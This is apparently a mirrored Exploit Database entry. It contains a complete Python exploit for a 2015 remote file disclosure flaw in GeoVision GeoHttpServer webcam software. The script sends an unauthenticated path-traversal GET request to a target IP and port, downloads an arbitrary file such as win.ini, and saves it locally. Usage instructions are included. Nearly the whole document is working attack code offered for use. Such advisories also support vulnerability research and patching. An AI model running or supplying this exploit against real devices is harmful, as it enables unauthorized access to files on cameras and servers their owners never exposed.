GeoVision (GeoHttpServer) Webcams – Remote File Disclosure

• Exploit Database
• 109 阅读

• 作者： Viktor Minin
  日期： 2015-06-10
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/37258/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80

  #!/usr/bin/python import os import sys import socket import binascii   &apos;&apos;&apos; Title : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit CVE-ID: none Product : GeoVision System : GeoHttpServer Affected: 8.3.3.0 (may be more) Impact: Critical Remote: Yes Website link: http://www.geovision.com.tw/ Reported: 10/06/2015 Author: Viktor Minin, minin.viktor@gmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- No authentication (login) is required to exploit this vulnerability. The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability. An attacker can exploit this vulnerability to retrieve and download stored files on server such as &apos;boot.ini&apos; and &apos;win.ini&apos; by using a simple url request which made by browser. &apos;&apos;&apos;   #os.system("cls") os.system(&apos;title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit&apos;); os.system(&apos;color 2&apos;);   socket.setdefaulttimeout = 0.50 os.environ[&apos;no_proxy&apos;] = &apos;127.0.0.1,localhost&apos; CRLF = "\r\n"     def main(): print "#######################################################################" print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit" print "# Usage: <ip> <port> <file>" print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini" print "#######################################################################" exit()   try: url = sys.argv[1] port = int(sys.argv[2]) #files = open(sys.argv[3],&apos;r&apos;).read().split() file = sys.argv[3] except: main() def recvall(sock): data = "" part = None while part != "": part = sock.recv(4096) data += part return data   def request(url, port, pfile): PATH = str(pfile) HOST = url PORT = port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.connect((HOST, PORT)) sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF)) data = recvall(sock) temp = data.split("\r\n\r\n") sock.shutdown(1) sock.close() return temp[1]   ret = request(url, port, file) hex = "".join("{:02x}".format(ord(c)) for c in ret) bin = binascii.unhexlify(hex) print ret file = open(file.replace(&apos;\\&apos;, &apos;_&apos;),"wb") file.write(bin) file.close()   #~EOF